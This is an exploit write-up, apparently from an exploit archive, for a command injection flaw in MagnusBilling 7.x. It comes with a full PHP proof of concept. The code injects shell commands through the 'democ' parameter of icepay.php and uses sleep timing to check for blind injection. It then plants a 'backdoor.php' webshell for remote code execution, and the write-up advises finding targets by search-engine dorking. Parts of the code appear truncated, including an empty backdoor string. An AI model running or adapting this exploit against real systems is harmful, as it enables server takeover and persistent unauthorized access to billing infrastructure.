============================================================================================================================================= | # Title : MagnusBilling 7.x Code Injection Vulnerability | | # Author : indoushka | | # Tested on : Windows 10 Fr(Pro) / browser : Mozilla Firefox 130.0.2 (64 bits) | | # Vendor : https://www.magnusbilling.org/ | ============================================================================================================================================= POC : [+] Dorking in Google or other search engines. [+] Uses cURL to allow remote command execution. [+] Line 83: set your target. [+] Save the code as poc.php. [+] Usage : cmd => c:\www\test\php poc.php [+] Payload : targetUri = $targetUri; } // Function to execute commands on the target public function executeCommand($cmd) { $url = $this->targetUri . '/lib/icepay/icepay.php?democ=/dev/null;' . $cmd . ';#'; return file_get_contents($url); // Send HTTP request } // Function to execute PHP code on the target public function executePhp($cmd) { $payload = base64_encode($cmd); $url = $this->targetUri . '/lib/icepay/' . 
$this->webShellName; $postFields = [$this->postParam => $payload]; return $this->sendPostRequest($url, $postFields); // Send POST request } // Upload backdoor webshell to the target public function uploadBackdoorWebShell() { // Name of the webshell to be uploaded $this->webShellName = "backdoor.php"; // Set a specific name for the backdoor file // Backdoor PHP code (this allows execution of commands passed through a GET parameter 'cmd') $backdoorCode = ""; // Encode the webshell content $encodedPayload = base64_encode($backdoorCode); // Construct the command to upload the backdoor $cmd = "echo {$encodedPayload} | base64 -d > ./{$this->webShellName}"; // Execute the command to upload the backdoor return $this->executeCommand($cmd); } // Check if the target can be exploited public function check() { $url = $this->targetUri; $response = file_get_contents($url); if (!$response || !preg_match('/MagnusBilling/i', $response)) { return "Safe: Likely not a MagnusBilling application."; } $sleepTime = rand(4, 8); $this->executeCommand("sleep {$sleepTime}"); sleep($sleepTime); // Simulate blind command injection return "Vulnerable: Command injection successful."; } // Main function to exploit the target public function exploit() { echo "Uploading backdoor...\n"; $result = $this->uploadBackdoorWebShell(); if (!$result) { die("Backdoor upload failed."); } echo "Backdoor uploaded at: {$this->targetUri}/lib/icepay/{$this->webShellName}\n"; } // Helper function to send POST requests private function sendPostRequest($url, $postFields) { $options = [ 'http' => [ 'method' => 'POST', 'header' => 'Content-Type: application/x-www-form-urlencoded', 'content' => http_build_query($postFields) ] ]; $context = stream_context_create($options); return file_get_contents($url, false, $context); } } // Usage example $exploit = new MagnusBillingExploit('http://target-url/mbilling'); $exploit->exploit(); Greetings to 
:===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================